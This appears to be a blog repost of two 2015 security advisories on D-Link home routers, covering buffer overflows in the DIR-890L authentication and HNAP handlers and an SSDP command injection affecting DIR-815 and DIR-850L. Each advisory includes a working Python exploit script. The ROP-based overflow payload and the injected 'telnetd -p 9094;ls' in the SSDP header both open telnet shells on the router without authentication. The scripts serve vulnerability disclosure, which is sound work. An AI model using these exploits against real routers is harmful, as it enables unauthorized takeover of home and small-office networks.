All posts by Loudagonda

D-Link DIR-890L/R – Multiple Buffer Overflow Vulnerabilities

## Advisory Information

Title: DIR-890L/R Buffer overflows in authentication and HNAP functionalities. 
Date published: July,17th, 2015
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None

Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, 
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061

However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.


## Product Description

DIR-890L/R -- AC3200 Ultra Wi-Fi Router. Mainly used by home and small offices.

## Vulnerabilities Summary

Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and  HNAP  functionalities. first 2 of the buffer overflows in auth and HNAP  can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices. But it works as the buffer overflow happens in a seperate process than web server which does not allow web server to crash and hence attacker wins.

## Details

Buffer overflow in auth 
----------------------------------------------------------------------
import socket
import struct

buf = "GET /webfa_authentication.cgi?id="
buf+="A"*408
buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack
buf+="sh;#"+"CCCC"+"DDDD" #R0-R2
buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG"      #R3 with system address and R4 and R5 with junk values
buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address
buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd
buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n"

print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)

----------------------------------------------------------------------

Buffer overflow in HNAP
----------------------------------------------------------------------
import socket
import struct

#Currently the address of exit function in libraray used as $PC

buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220
buf+= "\r\n" + "1\r\n\r\n"
 
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------


## Report Timeline

* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.

## Credit

This vulnerability was found by Samuel Huntley

SSDP command injection using UDP for a lot of Dlink routers including DIR-815, DIR-850L

## Advisory Information

Title: SSDP command injection using UDP for a lot of Dlink routers including DIR-815, DIR-850L
Vendors contacted: William Brown <william.brown@dlink.com> (Dlink)
Release mode: Released
CVE: None

Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, 
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061

However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.

## Product Description

Many Dlink routers affected. Tested on DIR-815.

## Vulnerabilities Summary

DIR-815,850L and most of Dlink routers are susceptible to this flaw. This allows to perform command injection using SSDP packets and on UDP. So no authentication required. Just the fact that the attacker needs to be on wireless LAN or be able to fake a request coming from internal wireless LAN using some other mechanism.
## Details
# Command injection
-------------------------------------------------------------------
import socket
import struct

# This vulnerability is pretty much in every router that has cgibin and uses SSDP code in that cgibin. This one worked on the device dir-815. Will work only in WLAN


buf = 'M-SEARCH * HTTP/1.1\r\nHOST:239.255.255.250:1900\r\nST:urn:schemas-upnp-org:service:WANIPConnection:1;telnetd -p 9094;ls\r\nMX:2\r\nMAN:"ssdp:discover"\r\n\r\n'

print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("239.255.255.250", 1900))
s.send(buf)
s.close()
---------------------------------------------------------------------
## Report Timeline

* Jan 22, 2015: Vulnerability found by Samuel Huntley by William Brown.
* Feb 15, 2015: Vulnerability is patched by Dlink
* Nov 13, 2015: A public advisory is sent to security mailing lists.

## Credit

This vulnerability was found by Samuel Huntley